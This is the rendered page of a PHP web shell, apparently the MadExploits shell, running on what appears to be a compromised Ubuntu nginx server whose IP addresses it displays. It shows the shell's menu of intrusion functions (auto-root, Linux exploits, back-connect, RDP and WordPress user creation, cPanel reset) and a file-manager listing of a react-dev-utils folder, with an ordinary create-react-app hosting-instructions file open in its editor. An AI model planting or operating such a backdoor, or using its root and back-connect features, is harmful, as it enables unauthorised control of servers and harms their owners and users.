Linux ubuntu22 5.15.0-133-generic #144-Ubuntu SMP Fri Feb 7 20:47:38 UTC 2025 x86_64
nginx/1.18.0
: 128.199.27.159 | : 216.73.216.1
Cant Read [ /etc/named.conf ]
8.1.31
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
quiz1 /
node_modules /
react-dev-utils /
[ HOME SHELL ]
Name
Size
Permission
Action
node_modules
[ DIR ]
dr-xr-xr-x
FileSizeReporter.js
4.5
KB
-rw-rw-rw-
ForkTsCheckerWarningWebpackPlu...
823
B
-rw-rw-rw-
ForkTsCheckerWebpackPlugin.js
321
B
-rw-rw-rw-
InlineChunkHtmlPlugin.js
1.88
KB
-rw-rw-rw-
InterpolateHtmlPlugin.js
1.41
KB
-rw-rw-rw-
LICENSE
1.05
KB
-rw-rw-rw-
ModuleNotFoundPlugin.js
4.19
KB
-rw-rw-rw-
ModuleScopePlugin.js
3.39
KB
-rw-rw-rw-
README.md
13.27
KB
-rw-rw-rw-
WebpackDevServerUtils.js
13.12
KB
-rw-rw-rw-
browsersHelper.js
2.45
KB
-rw-rw-rw-
chalk.js
254
B
-rw-rw-rw-
checkRequiredFiles.js
856
B
-rw-rw-rw-
clearConsole.js
365
B
-rw-rw-rw-
crossSpawn.js
270
B
-rw-rw-rw-
errorOverlayMiddleware.js
732
B
-rw-rw-rw-
eslintFormatter.js
2.74
KB
-rw-rw-rw-
evalSourceMapMiddleware.js
1.52
KB
-rw-rw-rw-
formatWebpackMessages.js
4.17
KB
-rw-rw-rw-
getCSSModuleLocalIdent.js
1.24
KB
-rw-rw-rw-
getCacheIdentifier.js
584
B
-rw-rw-rw-
getProcessForPort.js
1.98
KB
-rw-rw-rw-
getPublicUrlOrPath.js
2.02
KB
-rw-rw-rw-
globby.js
257
B
-rw-rw-rw-
ignoredFiles.js
467
B
-rw-rw-rw-
immer.js
254
B
-rw-rw-rw-
launchEditor.js
19.02
KB
-rw-rw-rw-
launchEditorEndpoint.js
330
B
-rw-rw-rw-
noopServiceWorkerMiddleware.js
1.33
KB
-rw-rw-rw-
openBrowser.js
4.32
KB
-rw-rw-rw-
openChrome.applescript
2.59
KB
-rw-rw-rw-
package.json
2.31
KB
-rw-rw-rw-
printBuildError.js
1.2
KB
-rw-rw-rw-
printHostingInstructions.js
3.62
KB
-rw-rw-rw-
redirectServedPathMiddleware.j...
747
B
-rw-rw-rw-
refreshOverlayInterop.js
447
B
-rw-rw-rw-
webpackHotDevClient.js
8.67
KB
-rw-rw-rw-
Delete
Unzip
Zip
${this.title}
Close
Code Editor : printHostingInstructions.js
/** * Copyright (c) 2015-present, Facebook, Inc. * * This source code is licensed under the MIT license found in the * LICENSE file in the root directory of this source tree. */ 'use strict'; const chalk = require('chalk'); const url = require('url'); const globalModules = require('global-modules'); const fs = require('fs'); function printHostingInstructions( appPackage, publicUrl, publicPath, buildFolder, useYarn ) { if (publicUrl && publicUrl.includes('.github.io/')) { // "homepage": "http://user.github.io/project" const publicPathname = url.parse(publicPath).pathname; const hasDeployScript = typeof appPackage.scripts !== 'undefined' && typeof appPackage.scripts.deploy !== 'undefined'; printBaseMessage(buildFolder, publicPathname); printDeployInstructions(publicUrl, hasDeployScript, useYarn); } else if (publicPath !== '/') { // "homepage": "http://mywebsite.com/project" printBaseMessage(buildFolder, publicPath); } else { // "homepage": "http://mywebsite.com" // or no homepage printBaseMessage(buildFolder, publicUrl); printStaticServerInstructions(buildFolder, useYarn); } console.log(); console.log('Find out more about deployment here:'); console.log(); console.log(` ${chalk.yellow('https://cra.link/deployment')}`); console.log(); } function printBaseMessage(buildFolder, hostingLocation) { console.log( `The project was built assuming it is hosted at ${chalk.green( hostingLocation || 'the server root' )}.` ); console.log( `You can control this with the ${chalk.green( 'homepage' )} field in your ${chalk.cyan('package.json')}.` ); if (!hostingLocation) { console.log('For example, add this to build it for GitHub Pages:'); console.log(); console.log( ` ${chalk.green('"homepage"')} ${chalk.cyan(':')} ${chalk.green( '"http://myname.github.io/myapp"' )}${chalk.cyan(',')}` ); } console.log(); console.log(`The ${chalk.cyan(buildFolder)} folder is ready to be deployed.`); } function printDeployInstructions(publicUrl, hasDeployScript, useYarn) { console.log(`To publish it at ${chalk.green(publicUrl)} , run:`); console.log(); // If script deploy has been added to package.json, skip the instructions if (!hasDeployScript) { if (useYarn) { console.log(` ${chalk.cyan('yarn')} add --dev gh-pages`); } else { console.log(` ${chalk.cyan('npm')} install --save-dev gh-pages`); } console.log(); console.log( `Add the following script in your ${chalk.cyan('package.json')}.` ); console.log(); console.log(` ${chalk.dim('// ...')}`); console.log(` ${chalk.yellow('"scripts"')}: {`); console.log(` ${chalk.dim('// ...')}`); console.log( ` ${chalk.yellow('"predeploy"')}: ${chalk.yellow( `"${useYarn ? 'yarn' : 'npm run'} build",` )}` ); console.log( ` ${chalk.yellow('"deploy"')}: ${chalk.yellow( '"gh-pages -d build"' )}` ); console.log(' }'); console.log(); console.log('Then run:'); console.log(); } console.log(` ${chalk.cyan(useYarn ? 'yarn' : 'npm')} run deploy`); } function printStaticServerInstructions(buildFolder, useYarn) { console.log('You may serve it with a static server:'); console.log(); if (!fs.existsSync(`${globalModules}/serve`)) { if (useYarn) { console.log(` ${chalk.cyan('yarn')} global add serve`); } else { console.log(` ${chalk.cyan('npm')} install -g serve`); } } console.log(` ${chalk.cyan('serve')} -s ${buildFolder}`); } module.exports = printHostingInstructions;
Close